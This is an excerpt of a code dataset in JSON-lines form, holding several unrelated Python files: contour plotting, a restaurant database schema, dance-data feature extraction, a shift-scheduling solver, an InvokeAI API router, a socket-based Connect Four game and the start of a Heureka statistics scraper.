theta_line_v = list()\r\n theta_line_hs = list()\r\n contour.theta_v = list()\r\n contour.theta_hs = list()\r\n for j, theta in enumerate(thetas):\r\n theta_line_v.append(np.multiply(np.cos(theta), line_length) + v0)\r\n theta_line_hs.append(np.multiply(np.sin(theta), line_length) + hs0)\r\n theta_v_j, theta_hs_j = contour_intersection(\r\n theta_line_v[j], theta_line_hs[j], contour.c[0], contour.c[1], True)\r\n\r\n contour.theta_v.append(theta_v_j)\r\n contour.theta_hs.append(theta_hs_j)\r\n\r\n\r\ntheta_v_ij = np.zeros(shape=(len(contours), thetas.size))\r\ntheta_hs_ij = np.zeros(shape=(len(contours), thetas.size))\r\ndistance_to_origin_ij = np.zeros(shape=(len(contours), thetas.size))\r\nfor i, contour in enumerate(contours):\r\n for j, (v_j, hs_j) in enumerate(zip(contour.theta_v, contour.theta_hs)):\r\n theta_v_ij[i, j] = v_j\r\n theta_hs_ij[i, j] = hs_j\r\n o = np.array([v0, hs0])\r\n p = np.array([v_j, hs_j]).flatten()\r\n op = p - o\r\n distance_to_origin_ij[i, j] = np.sqrt(op[0]*op[0] + op[1]*op[1])\r\nsorted_v = np.zeros(shape=(len(contours), thetas.size))\r\nsorted_hs = np.zeros(shape=(len(contours), thetas.size))\r\nfor j in range(thetas.size):\r\n sorted_indices = np.argsort(distance_to_origin_ij[:, j])\r\n sorted_v[:, j] = theta_v_ij[sorted_indices, j]\r\n sorted_hs[:, j] = theta_hs_ij[sorted_indices, j]\r\nlower_index = 0\r\nmedian_index = 4\r\nupper_index = 8\r\n\r\ncl = Object()\r\ncm = Object()\r\ncu = Object()\r\n\r\ncl.v = sorted_v[lower_index, :]\r\ncl.hs = sorted_hs[lower_index, :]\r\ncm.v = sorted_v[median_index, :]\r\ncm.hs = sorted_hs[median_index, :]\r\ncu.v = sorted_v[upper_index, :]\r\ncu.hs = sorted_hs[upper_index, :]\r\n\r\n\r\n# Create the overlay plot.\r\naxs[0].scatter(v_p, hs_p, c='black', alpha=0.5, zorder=-2, rasterized=True, label='Dataset D (provided)')\r\nfor i in range(n_contours_to_analyze):\r\n if i == 0:\r\n clabel = 'Submitted 50-yr contours'\r\n else:\r\n clabel = None\r\n plot_contour(contours_v[i], contours_hs[i],\r\n alpha=0.5, ax=axs[0], contour_label=clabel)\r\n\r\naxs[0].set_rasterization_zorder(-1)\r\naxs[0].set_xlabel(label_v.capitalize())\r\naxs[0].set_ylabel(label_hs.capitalize())\r\n\r\n# Create the confidence bound plot.\r\naxs[1].scatter(v_p, hs_p, c='black', alpha=0.5, zorder=-2, rasterized=True)\r\nplot_confidence_interval(x_median=cm.v, y_median=cm.hs, \r\n x_bottom=cl.v, y_bottom=cl.hs, x_upper=cu.v, y_upper=cu.hs, ax=axs[1], \r\n x_label=label_v.capitalize(), y_label=label_hs.capitalize(), \r\n contour_labels=['Median contour', 'Min. contour', 'Max. contour'])\r\n \r\nfor ax in axs.flat:\r\n ax.label_outer()\r\n ax.set_xlim((0, 35))\r\n ax.set_ylim((0, 18))\r\nfig.tight_layout()\r\nfig.savefig('results/discussion/gfx/e1_confidence_bounds.pdf', bbox_inches='tight')\r\n","sub_path":"results/discussion/e1_confidence_bound.py","file_name":"e1_confidence_bound.py","file_ext":"py","file_size_in_byte":9392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"151890070","text":"import sys\nimport os\n\nfrom sqlalchemy import Column, ForeignKey, Integer, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy import create_engine\n\nBase = declarative_base()\n\n#-----------------------------------------------------\n# Class representing the restaurant table in the\n# database. \n#-----------------------------------------------------\nclass Restaurant(Base):\n\t__tablename__ = 'restaurant'\n\tid = Column(Integer, primary_key = True)\n\tname = Column(String(80), nullable = False)\n\tdescription = Column(String(250), nullable = True)\n\taddress = Column(String(300), nullable = True)\n\tphone = Column(String(25), nullable = True)\n\twebsite = Column(String(100), nullable = True)\n\n\t@property\n\tdef serialize(self):\n\t\treturn { 'id': self.id,\n\t\t'name': self.name, \n\t\t'description': self.description, \n\t\t'adddress' : self.address, \n\t\t'phone' : self.phone, \n\t\t'website' : self.website }\n\n\t\n#-----------------------------------------------------\n# Class representing the menu item table in the\n# database. \n#----------------------------------------------------\t\nclass MenuItem(Base):\n\t__tablename__ = 'menu_item'\n\tid = Column(Integer, primary_key = True)\n\tname = Column(String(80), nullable = False)\n\tcourse = Column(String(250))\n\tdescription = Column(String(250))\n\tprice = Column(String(8))\n\trestaurant_id = Column(Integer, ForeignKey('restaurant.id'))\n\trestaurant = relationship(Restaurant)\n\t\n\t@property\n\tdef serialize(self):\n\t\treturn { \n\t\t'id': self.id,\n\t\t'name': self.name, \n\t\t'course' :self.course,\n\t\t'description': self.description, \n\t\t'price' : self.price}\n\t\t\n#-----------------------------------------------------\nengine = create_engine('sqlite:///restaurantmenu.db')\nBase.metadata.create_all(engine)\n","sub_path":"database/restaurant_database_setup.py","file_name":"restaurant_database_setup.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"609504201","text":"import pandas as pd\nimport numpy as np\nfrom os import listdir\n\ndef data_process(input_data):\n # extract features from raw data\n # mean, variance, median, mean absolute deviation, max, min\n X = []\n for i in range(len(input_data[0])):\n data = []\n for j in range(len(input_data)):\n data.append(input_data[j][i])\n # mean\n X.append(np.mean(data))\n # variance\n X.append(np.var(data))\n # median\n X.append(np.median(data))\n # mean absolute deviation\n X.append(np.mean(np.absolute(data - np.mean(data))))\n # max\n X.append(max(data))\n # min\n X.append(min(data))\n return np.array(X)\n\nwindow_size = 50\ndance_data = np.array([[0.0]*91])\nfor f in listdir(\"../final_data/\"):\n if \".txt\" in f:\n dataframe = pd.read_csv(\"../final_data/\"+f, sep=\",\", header=None)\n dataset = dataframe.values\n print(f)\n i = 0\n while i+window_size <= len(dataset): \n X = dataset[i:i+window_size,0:15]\n X = data_process(X)\n if \"chicken\" in f:\n X = np.append(X, 0)\n if \"cowboy_front\" in f:\n X = np.append(X, 1)\n if \"cowboy_back\" in f:\n X = np.append(X, 2)\n if \"crab\" in f:\n X = np.append(X, 3)\n if \"hunchback\" in f:\n X = np.append(X, 4)\n if \"raffles_left\" in f:\n X = np.append(X, 5)\n if \"raffles_right\" in f:\n X = np.append(X, 6)\n if \"running\" in f:\n X = np.append(X, 7)\n if \"james\" in f:\n X = np.append(X, 8)\n if \"snake\" in f:\n X = np.append(X, 9)\n if \"double\" in f:\n X = np.append(X, 10)\n if \"mermaid\" in f:\n X = np.append(X, 11)\n if \"final\" in f:\n X = np.append(X, 12)\n dance_data = np.append(dance_data, [X], axis=0)\n i += 10\ndance_data = dance_data[1:]\nnp.savetxt(\"../final_data/processed_data/window50.csv\", dance_data, delimiter=\",\")\n","sub_path":"software/classifiers/process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491177528","text":"import pulp\nimport numpy as np\n\n#\n# ShiftSolver solves the linear problem of give team shift table\n# The number of shifts solved by ShiftSolver is at maximum `max_shift`\n#\n# Each request is a model.Request which has\n# (id, member, team, start_time, end_time, availability)\n#\n\nclass ShiftSolver:\n HOURS_IN_DAY = 24\n MINIMUM_MEMBERS = 3\n def __init__(self, team, member_list, days_in_shift=7):\n self.team = team\n self.member_list = member_list\n self.num_members = len(self.member_list)\n self.days_in_shift = days_in_shift\n self.problem = pulp.LpProblem('shift_table', pulp.LpMaximize)\n self.lp_variables = pulp.LpVariable.dicts(\n 'VAR',\n (range(self.num_members), range(self.days_in_shift), range(ShiftSolver.HOURS_IN_DAY)),\n 0, 1, 'Binary'\n )\n self.availability = np.zeros([\n self.num_members,\n self.days_in_shift,\n ShiftSolver.HOURS_IN_DAY\n ])\n\n def _init_availability(self, shift):\n '''\n @params shift: which includes (days, requests) in tuple format\n '''\n (days, requests, start_day) = shift\n start_in_shift = days[0]\n assert len(days) == self.days_in_shift\n for r in requests:\n if r.team == self.team:\n d = (r.start_time.date() - start_in_shift).days\n for t in xrange(r.start_time.hour, r.end_time.hour):\n self.availability[r.member][d][t] = r.availability\n\n\n\n def solve(self, shift):\n self._init_availability(shift)\n # Create the objective function\n obj = None\n for m in xrange(self.num_members):\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n obj += self.availability[m][d][t] * self.lp_variables[m][d][t]\n\n # Set objective function of this linear problem\n self.problem += obj\n\n # Set the contraint of variables of this problem\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n c = None\n for m in xrange(self.num_members):\n c += self.lp_variables[m][d][t]\n self.problem += c >= ShiftSolver.MINIMUM_MEMBERS\n\n status = self.problem.solve()\n\n result = np.zeros([self.num_members, self.days_in_shift, ShiftSolver.HOURS_IN_DAY])\n for m in xrange(self.num_members):\n for d in xrange(self.days_in_shift):\n for t in xrange(ShiftSolver.HOURS_IN_DAY):\n result[m][d][t] = self.lp_variables[m][d][t].value()\n\n return (pulp.LpStatus[status], result)\n","sub_path":"src/ShiftSolver.py","file_name":"ShiftSolver.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"491083241","text":"import typing\nfrom enum import Enum\nfrom fastapi import Body\nfrom fastapi.routing import APIRouter\nfrom pathlib import Path\nfrom pydantic import BaseModel, Field\n\nfrom invokeai.backend.image_util.patchmatch import PatchMatch\nfrom invokeai.backend.image_util.safety_checker import SafetyChecker\nfrom invokeai.backend.image_util.invisible_watermark import InvisibleWatermark\nfrom invokeai.app.invocations.upscale import ESRGAN_MODELS\n\nfrom invokeai.version import __version__\n\nfrom ..dependencies import ApiDependencies\nfrom invokeai.backend.util.logging import logging\n\n\nclass LogLevel(int, Enum):\n NotSet = logging.NOTSET\n Debug = logging.DEBUG\n Info = logging.INFO\n Warning = logging.WARNING\n Error = logging.ERROR\n Critical = logging.CRITICAL\n\n\nclass Upscaler(BaseModel):\n upscaling_method: str = Field(description=\"Name of upscaling method\")\n upscaling_models: list[str] = Field(description=\"List of upscaling models for this method\")\n\n\napp_router = APIRouter(prefix=\"/v1/app\", tags=[\"app\"])\n\n\nclass AppVersion(BaseModel):\n \"\"\"App Version Response\"\"\"\n\n version: str = Field(description=\"App version\")\n\n\nclass AppConfig(BaseModel):\n \"\"\"App Config Response\"\"\"\n\n infill_methods: list[str] = Field(description=\"List of available infill methods\")\n upscaling_methods: list[Upscaler] = Field(description=\"List of upscaling methods\")\n nsfw_methods: list[str] = Field(description=\"List of NSFW checking methods\")\n watermarking_methods: list[str] = Field(description=\"List of invisible watermark methods\")\n\n\n@app_router.get(\"/version\", operation_id=\"app_version\", status_code=200, response_model=AppVersion)\nasync def get_version() -> AppVersion:\n return AppVersion(version=__version__)\n\n\n@app_router.get(\"/config\", operation_id=\"get_config\", status_code=200, response_model=AppConfig)\nasync def get_config() -> AppConfig:\n infill_methods = [\"tile\", \"lama\"]\n if PatchMatch.patchmatch_available():\n infill_methods.append(\"patchmatch\")\n\n upscaling_models = []\n for model in typing.get_args(ESRGAN_MODELS):\n upscaling_models.append(str(Path(model).stem))\n upscaler = Upscaler(upscaling_method=\"esrgan\", upscaling_models=upscaling_models)\n\n nsfw_methods = []\n if SafetyChecker.safety_checker_available():\n nsfw_methods.append(\"nsfw_checker\")\n\n watermarking_methods = []\n if InvisibleWatermark.invisible_watermark_available():\n watermarking_methods.append(\"invisible_watermark\")\n\n return AppConfig(\n infill_methods=infill_methods,\n upscaling_methods=[upscaler],\n nsfw_methods=nsfw_methods,\n watermarking_methods=watermarking_methods,\n )\n\n\n@app_router.get(\n \"/logging\",\n operation_id=\"get_log_level\",\n responses={200: {\"description\": \"The operation was successful\"}},\n response_model=LogLevel,\n)\nasync def get_log_level() -> LogLevel:\n \"\"\"Returns the log level\"\"\"\n return LogLevel(ApiDependencies.invoker.services.logger.level)\n\n\n@app_router.post(\n \"/logging\",\n operation_id=\"set_log_level\",\n responses={200: {\"description\": \"The operation was successful\"}},\n response_model=LogLevel,\n)\nasync def set_log_level(\n level: LogLevel = Body(description=\"New log verbosity level\"),\n) -> LogLevel:\n \"\"\"Sets the log verbosity level\"\"\"\n ApiDependencies.invoker.services.logger.setLevel(level)\n return LogLevel(ApiDependencies.invoker.services.logger.level)\n","sub_path":"invokeai/app/api/routers/app_info.py","file_name":"app_info.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"517578487","text":"#!/usr/bin/env python3\n\nimport numpy as np\nfrom additional.settingsWindow import *\nimport socket\n\n#class for intitializing socket and socket functions\n#__init__ decided whether socket should act as server or client\n#creates integer userInput: 1 for server, 2 for client\n#can be hard coded or user inputted ip and port\n\nclass sockFunc:\n def __init__(self,dialog):\n if dialog != None:\n self.userInput = dialog[0]\n elif not dialog or dialog == None:\n self.userInput = None\n if self.userInput == 1:\n self.sockHost = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.servPort = dialog[1]\n self.sockHost.bind((\"\",int(self.servPort)))\n self.sockHost.listen(1)\n self.sockHost.settimeout(0.3)\n q = 0\n while True:\n if q%3 == 0:\n statusBar.config(text=\"Waiting on opponent. \")\n elif q%3 == 1:\n statusBar.config(text=\"Waiting on opponent.. \")\n elif q%3 == 2:\n statusBar.config(text=\"Waiting on opponent...\")\n root.update()\n try:\n self.sock, self.addr = self.sockHost.accept()\n except:\n q += 1\n continue\n if self.sock and self.addr:\n statusBar.config(text=\"\")\n break\n print(\"Connection received from \",self.addr)\n self.startOrder = self.userInput\n elif self.userInput == 2:\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.servIP = dialog[1]\n self.servPort = dialog[2]\n self.sock.connect((self.servIP,int(self.servPort)))\n print(\"Connected to server at \",self.servIP,\":\",self.servPort)\n if self.servIP == '192.232.224.13' or self.servIP == '192.232.224.14': #looks for the dedicated server\n self.startOrder = self.rcvData()\n else:\n self.startOrder = self.userInput\n else:\n print(\"Aborted.\")\n def sendData(self, dataOut):\n self.dataOut = str(dataOut).encode()\n self.sock.sendall(self.dataOut)\n def rcvData(self):\n self.sock.settimeout(0.3)\n q = 0\n while True:\n if q%3 == 0:\n statusBar.config(text=\"Waiting on opponent. \")\n elif q%3 == 1:\n statusBar.config(text=\"Waiting on opponent.. \")\n elif q%3 == 2:\n statusBar.config(text=\"Waiting on opponent...\")\n root.update()\n try:\n self.dataIn = self.sock.recv(4096)\n except:\n q += 1\n continue\n if self.dataIn:\n statusBar.config(text=\"\")\n break\n if self.dataIn.decode() != '86':\n return int(self.dataIn.decode())\n elif self.dataIn.decode() == '86':\n statusBar.config(text=\"Disconnected.\")\n popup = Tk()\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,767))\n drawButton = Button(popup,text=\"Opponent disconnected\",command=lambda: popupButton(popup,767))\n drawButton.pack()\n print(\"Opponent Disconnected\")\n return 767\n def __del__(self):\n self.sock.close()\n print(\"Closed\")\n\n#takes a player color, row, col\n#player 1 is blue\n#player 2 is red\n#can change this with global pColor\n\ndef puckDraw(pColor,row,col):\n if pColor == 1:\n tempLbl = imgCanv.create_image(42.5+(80*col),42.5, image=bluepuck)\n imgCanv.tag_lower(tempLbl)\n imgCanv.update()\n if pColor == 2:\n tempLbl = imgCanv.create_image(42.5+(80*col),42.5, image=redpuck)\n imgCanv.tag_lower(tempLbl)\n imgCanv.update()\n for x in range(row*40):\n imgCanv.move(tempLbl, 0, 2)\n imgCanv.update()\n\n#winfound takes a player identifier\n#creates a popup message dependent on player number\n\ndef winfound(player):\n popup = Tk()\n if player == 1:\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,1))\n winButton = Button(popup,text=\"You Won\",command=lambda: popupButton(popup,1))\n else:\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,2))\n winButton = Button(popup,text=\"You Lost\",command=lambda: popupButton(popup,2))\n winButton.pack()\n\n#takes the last played row and column and checks for a win\n#returns true or false\n#does not check who won\n\ndef wincheck(row,column,xtemp,ytemp):\n while (xtemp <= 1) and (ytemp <= 1):\n if (row+xtemp < 6 and column+ytemp < 7) and (row+xtemp > -1 and column+ytemp > -1):\n if matrix[row,column] == matrix[row+xtemp,column+ytemp]:\n if (row+(xtemp*-1) < 6 and column+(ytemp*-1) < 7) and (row+(xtemp*-1) > -1 and column+(ytemp*-1) > -1):\n if matrix[row,column] == matrix[row+(xtemp*-1),column+(ytemp*-1)]:\n if (row+(xtemp*2) < 6 and column+(ytemp*2) < 7) and (row+(xtemp*2) > -1 and column+(ytemp*2) > -1):\n if matrix[row,column] == matrix[row+(xtemp*2),column+(ytemp*2)]:\n #print(\"win found at:\",row+xtemp*2,column+ytemp*2)\n return TRUE\n if (row+(xtemp*2)*-1 < 6 and column+(ytemp*2)*-1 < 7) and (row+(xtemp*2)*-1 > -1 and column+(ytemp*2)*-1 > -1):\n if matrix[row,column] == matrix[row+(xtemp*2)*-1,column+(ytemp*2)*-1]: \n #print(\"alt win found at:\",row+(xtemp*2)*-1,column+(ytemp*2)*-1)\n return TRUE\n if (row+(xtemp*2) < 6 and column+(ytemp*2) < 7) and (row+(xtemp*2) > -1 and column+(ytemp*2) > -1):\n if matrix[row,column] == matrix[row+(xtemp*2),column+(ytemp*2)]:\n if (row+(xtemp*3) < 6 and column+(ytemp*3) < 7) and (row+(xtemp*3) > -1 and column+(ytemp*3) > -1):\n if matrix[row,column] == matrix[row+(xtemp*3),column+(ytemp*3)]:\n #print(\"four in a row:\",row+xtemp*3,column+ytemp*3)\n return TRUE\n xtemp += 1\n if (xtemp == 0) and (ytemp == 0):\n xtemp += 1\n if xtemp == 2:\n ytemp += 1\n xtemp = -1\n return FALSE\n\n#function to check for a draw condition\n#creates a popup window if true\n\ndef drawCheck():\n for x in range(7):\n if matrix[0,x] == 0:\n break\n if x == 6 and matrix[0,6] != 0:\n popup = Tk()\n popup.protocol(\"WM_DELETE_WINDOW\", lambda: popupButton(popup,3))\n drawButton = Button(popup,text=\"Draw\",command=lambda: popupButton(popup,3))\n drawButton.pack()\n return 1\n return 0\n\n#returns an alternating value 1/2 from argument\n\ndef turnchange(turn):\n if turn == 1:\n turn = 2\n elif turn == 2:\n turn = 1\n return turn\n\n#first wait for being client\ndef firstWait():\n column = userSock.rcvData()\n if column != 767:\n dropPuck(column,turnchange(pNumb),turnchange(pColor))\n\n#find row\n#set matrix value to pNumb\n#draw the puck\n#check for win -> if true winfound\n#check for top row -> if true check for draw\n\ndef dropPuck(column,pNumb,pColor):\n statusBar.config(text=\"\")\n global matrix\n global buttStatus\n x = 5\n while matrix[x][column] != 0:\n x -= 1\n matrix[x][column] = pNumb\n puckDraw(pColor,x,column)\n winStatus = wincheck(x,column,-1,-1)\n if winStatus == TRUE:\n winfound(pNumb)\n return 1\n if x == 0:\n buttFunc[column].config(state=DISABLED)\n buttStatus[column] = 1\n return drawCheck()\n return 0\n\ndef dropMain(column, pOrder, pNumb, pColor):\n winBreak = dropPuck(column, pNumb, pColor)\n userSock.sendData(column)\n for q in range(7):\n buttFunc[q].config(state=DISABLED)\n root.update()\n if winBreak == 0: #prevents hanging for winning player side\n column = userSock.rcvData()\n if column != 767:\n winBreak = dropPuck(column,turnchange(pNumb),turnchange(pColor)) #calls drop with alternate pNumb from 1(player 1) to 2(opponent)\n if winBreak == 0: #prevents hanging for losing player side\n for q in range(7):\n if buttStatus[q] == 0:\n buttFunc[q].config(state=NORMAL)\n \n\n#resets the matrix and image canvas\n#conditionally change the start orders\n#increments game score\n\ndef reset(gameEnd):\n global matrix\n global startOrder\n global buttStatus\n global pScore\n global oScore\n for q in range(7):\n buttStatus[q] = 0\n matrix = np.zeros((6,7))\n imgCanv.delete(ALL)\n gridLbl = imgCanv.create_image(282.5, 242.5, image=grid)\n #startOrder is the global start of round variable\n if gameEnd == 1: #player won - start second\n startOrder = 2\n pScore += 1\n pScoreLbl.config(text=\"Player: \"+str(pScore))\n elif gameEnd == 2: #player lost - start first\n startOrder = 1\n oScore += 1\n oScoreLbl.config(text=\"Opponent: \"+str(oScore))\n elif gameEnd == 3: #draw - alternate start orders\n startOrder = turnchange(startOrder)\n if startOrder == 2 and userSock.userInput == 2:\n if userSock.servIP == '192.232.224.13' or userSock.servIP == '192.232.224.14':\n userSock.sendData(69) #sends a flag to dedicated server on draw\n else: #first round decided by serv/client\n startOrder = userSock.startOrder\n if startOrder == 1:\n for q in range(7):\n buttFunc[q].config(state=NORMAL)\n elif startOrder == 2:\n for q in range(7):\n buttFunc[q].config(state=DISABLED)\n firstWait()\n for q in range(7):\n buttFunc[q].config(state=NORMAL)\n\ndef callback():\n userSock.sendData(86)\n root.destroy()\n\n#function to be called on button press after win/draw\n#destroys window\n#calls for reset\n\ndef popupButton(window,gameEnd):\n if gameEnd == 767:\n window.destroy()\n root.destroy()\n else:\n window.destroy()\n reset(gameEnd)\n\ndialogBox = settingsWindow()\n\nroot = Tk()\nroot.title(\"Four in a row\")\nbuttFrame = Frame(root)\nbuttFrame.pack()\n\n#puck image size = 150, 150\n#grid image size = 1130, 970\nimgCanv = Canvas(root, width=565, height=485)\nimgCanv.pack_propagate(0)\nimgCanv.pack()\n\nimgFile1 = Image.open(\"resources/grid.png\")\nimgWidth,imgHeight = imgFile1.size\nimgFile1.thumbnail((imgWidth*0.5,imgHeight*0.5))\ngrid = ImageTk.PhotoImage(imgFile1)\n\nimgFile2 = Image.open(\"resources/redpuck.png\")\nimgWidth,imgHeight = imgFile2.size\nimgFile2.thumbnail((imgWidth*0.5,imgHeight*0.5))\nredpuck = ImageTk.PhotoImage(imgFile2)\n\nimgFile3 = Image.open(\"resources/bluepuck.png\")\nimgWidth,imgHeight = imgFile3.size\nimgFile3.thumbnail((imgWidth*0.5,imgHeight*0.5))\nbluepuck = ImageTk.PhotoImage(imgFile3)\n\nbut1 = Button(text=\"1\",command=lambda: dropMain(0,startOrder,pNumb,pColor),state=DISABLED)\nbut1.grid(in_=buttFrame,ipadx=22,row=0,column=0,sticky=W+E)\nbut2 = Button(text=\"2\",command=lambda: dropMain(1,startOrder,pNumb,pColor),state=DISABLED)\nbut2.grid(in_=buttFrame,ipadx=22,row=0,column=1,sticky=W+E)\nbut3 = Button(text=\"3\",command=lambda: dropMain(2,startOrder,pNumb,pColor),state=DISABLED)\nbut3.grid(in_=buttFrame,ipadx=22,row=0,column=2,sticky=W+E)\nbut4 = Button(text=\"4\",command=lambda: dropMain(3,startOrder,pNumb,pColor),state=DISABLED)\nbut4.grid(in_=buttFrame,ipadx=22,row=0,column=3,sticky=W+E)\nbut5 = Button(text=\"5\",command=lambda: dropMain(4,startOrder,pNumb,pColor),state=DISABLED)\nbut5.grid(in_=buttFrame,ipadx=22,row=0,column=4,sticky=W+E)\nbut6 = Button(text=\"6\",command=lambda: dropMain(5,startOrder,pNumb,pColor),state=DISABLED)\nbut6.grid(in_=buttFrame,ipadx=22,row=0,column=5,sticky=W+E)\nbut7 = Button(text=\"7\",command=lambda: dropMain(6,startOrder,pNumb,pColor),state=DISABLED)\nbut7.grid(in_=buttFrame,ipadx=22,row=0,column=6,sticky=W+E)\n\npScore = 0 #player score tracker\noScore = 0 #opponent score tracker\npColor = dialogBox.colorInput #color decided by dialog box\npNumb = 1 #constant, player is always set to 1 for matrix functions\n\nstatusFrame = Frame(root)\nstatusFrame.grid_columnconfigure(1,minsize=150)\npScoreLbl = Label(root,text=\"Player: \"+str(pScore))\npScoreLbl.grid(in_=statusFrame,padx=50,row=0,column=0)\noScoreLbl = Label(root,text=\"Opponent: \"+str(oScore))\noScoreLbl.grid(in_=statusFrame,padx=50,row=0,column=2)\nstatusBar = Label(root,text=\"\")\nstatusBar.grid(in_=statusFrame,row=0,column=1)\nstatusFrame.pack()\n\nbuttFunc = {0:but1,1:but2,2:but3,3:but4,4:but5,5:but6,6:but7}\nbuttStatus = [0,0,0,0,0,0,0]\n#buttStatus will be used to track full column button disables\n#buttons should be disabled/enabled depending on sending/receiving data\n\nuserSock = sockFunc(dialogBox.networkInputs)\n\nroot.protocol(\"WM_DELETE_WINDOW\", callback)\n\nreset(0)\n\nroot.mainloop()\n","sub_path":"c4_net_cli.py","file_name":"c4_net_cli.py","file_ext":"py","file_size_in_byte":12997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"420531792","text":"import csv\nimport datetime\nfrom datetime import date, timedelta\nimport pandas as pd\nfrom lxml import html\nimport time\nimport mechanicalsoup\nfrom bs4 import BeautifulSoup\nfrom keboola import docker\n\n# this is the way how to store data in config files:\n# cfg = docker.Config('data')\ncfg = docker.Config('/data/')\nparameters = cfg.get_parameters()\n# load category ids to scrape\n# df = pd.read_csv('in/tables/categories_to_scrape.csv')\n# category_ids = df.category_id\n\n# date format checker\ndef validate(date_text):\n try:\n datetime.datetime.strptime(date_text, '%Y-%m-%d')\n except ValueError:\n raise ValueError(\"Incorrect data format, should be YYYY-MM-DD\")\n\n# initialize scrape_dates dict.\nscrape_dates = {}\n\n# date preset from input parameters. Bud date_preset='Yesteday'/'last_week' nebo vsechny datumy ve stanovenem intervalu\n# ! parametr 'date_preset' ma prednost.\nif parameters.get('Date_preset') == 'Yesterday':\n yesterday = date.today() - timedelta(1)\n d1 = yesterday\n d2 = d1\nelif parameters.get('Date_preset') == 'last_week':\n d1 = date.today() - timedelta(7)\n d2 = date.today() - timedelta(1)\nelif parameters.get('Date_preset') == 'last_3_days':\n d1 = date.today() - timedelta(3)\n d2 = date.today() - timedelta(1) \nelif parameters.get('Date_preset') == 'last_31_days':\n d1 = date.today() - timedelta(31)\n d2 = date.today() - timedelta(1)\t\nelif parameters.get('Date_preset') == 'last_year':\n d1 = date.today() - timedelta(365)\n d2 = date.today() - timedelta(1)\n# customdate\tif not preseted\nelse:\n validate(parameters.get('Date_from'))\n validate(parameters.get('Date_to'))\n d1 = datetime.datetime.strptime(parameters.get('Date_from'), '%Y-%m-%d')\n d2 = datetime.datetime.strptime(parameters.get('Date_to'), '%Y-%m-%d')\n# vypocet timedelty, ktera urcuje delku tahanych dni zpet\t\ndelta = d2 - d1\nfor i in range(delta.days+1):\n scrape_dates[i] = (d1+timedelta(i)).strftime('%Y-%m-%d')\n\n# devide scraped results into two columns: Value and currency;\n# So I can easy work with Eur or another currency in future.\n\ndef sanitizeStrings(text):\n textSplitted = text.string.rsplit(None, 1)\n firstResultTemp = textSplitted[0].replace('\\xa0', '') # if value > 999 and it result would be X XXX\n firstResult = firstResultTemp.replace(',', '.')\n secondResult = textSplitted[1]\n return firstResult, secondResult\n\n\n# yesterday = date.today() - timedelta(1)\n# desired_date = date.today() - timedelta(DATE_PERIOD)\n\n\n# print('Scraping from ' + desired_date.strftime('%Y-%m-%d') + ' to ' + yesterday.strftime('%Y-%m-%d'))\n\n# count days between dates\n# delta = yesterday - desired_date\n\n# for i in range(delta.days+1):\n# scrape_dates[i]=(desired_date+timedelta(i)).strftime('%Y-%m-%d')\n\nfor i in range(len(scrape_dates)):\n scrape_date = scrape_dates[i]\n print(\"Started scraping for \" + scrape_date)\n for entity in parameters.get('Entity').keys():\n for login in parameters.get('Entity').get(entity).keys():\n # Create a browser object\n browser = mechanicalsoup.Browser()\n\n if entity == 'Heureka.cz':\n Url_login = 'https://ucet.heureka.cz/prihlaseni'\n if entity == 'Heureka.sk':\n Url_login = 'https://ucet.heureka.sk/prihlasenie'\n\n login_page = browser.get(Url_login)\n\n # grab the login form\n login_form = login_page.soup.find(\"form\", {\"class\": \"c-form c-form--login js-form\"})\n\n login_form.find(\"input\", {\"name\": \"email\"})[\"value\"] = parameters.get('Entity').get(entity).get(login).get('Login')\n login_form.find(\"input\", {\"name\": \"password\"})[\"value\"] = parameters.get('Entity').get(entity).get(login).get('Password')\n\n # submit form\n browser.submit(login_form, login_page.url)\n\n # this is way how to load config from config JSON.\n NO_OF_SHOPS = len(parameters.get('Entity').get(entity).get(login).get('Shop_name'))\n\n for index in range(0, NO_OF_SHOPS):\n if entity == 'Heureka.cz':\n report_url = browser.get('http://sluzby.heureka.cz/obchody/statistiky/?shop=' + parameters.get('Entity').get(entity).get(login).get('Shop_id')[index] + '&from=' + scrape_date + '&to=' + scrape_date)\n if entity == 'Heureka.sk':\n report_url = browser.get('http://sluzby.heureka.sk/obchody/statistiky/?shop=' + parameters.get('Entity').get(entity).get(login).get('Shop_id')[index] + '&from=' + scrape_date + '&to=' + scrape_date)\n\n # placeholder for SK heureka or sometihing simillar\n shop = parameters.get('Entity').get(entity).get(login).get('Shop_name')[index]\n # create BeautifulSoup object\n report_object = report_url.soup\n # create HTML of content table\n tabulka = report_object.find_all('table', {'class': 'shop-list roi'})\n # create empty list so it will be easy to append results there.\n L = []\n rows = BeautifulSoup(str(tabulka), features=\"lxml\").findChildren(['tr'])\n for row in rows:\n cells = row.findChildren('td') # define table\n cells = cells[0:4] # Take just first 4 values of table\n # replace HTML chars\n if len(cells) >= 4:\n temp = sanitizeStrings(cells[3])\n costs = temp[0]\n currency = temp[1]\n if currency == u'Kč':\n currency = 'CZK'\n if currency == u'€':\n currency = 'EUR'\n\n temp = sanitizeStrings(cells[2])\n cpc = temp[0]\n visits_temp = cells[1].string.replace('\\xa0', '') # if value > 999 and it result would be 'X XXX'\n visits = float(visits_temp)\n # name cleaning...\n name = cells[0].string\n if name is None:\n name = entity\n\n prvekL = {'shop': shop, 'date': scrape_date, 